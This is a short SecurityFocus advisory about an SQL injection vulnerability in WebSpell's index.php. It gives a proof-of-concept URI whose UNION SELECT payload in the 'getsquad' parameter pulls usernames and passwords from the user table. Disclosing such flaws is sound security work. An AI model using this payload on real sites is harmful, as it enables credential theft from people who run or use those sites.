Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

WebSpell Index.PHP SQL Injection Vulnerability

Attackers can exploit these issues via a web client.

The following proof-of-concept URI is available:

http://www.example.com/index.php?site=squads&getsquad=Where+1=0+Union+Select+1,1,username,1,password,1+from+[PREFIX]_user/*







 

Privacy Statement
Copyright 2009, SecurityFocus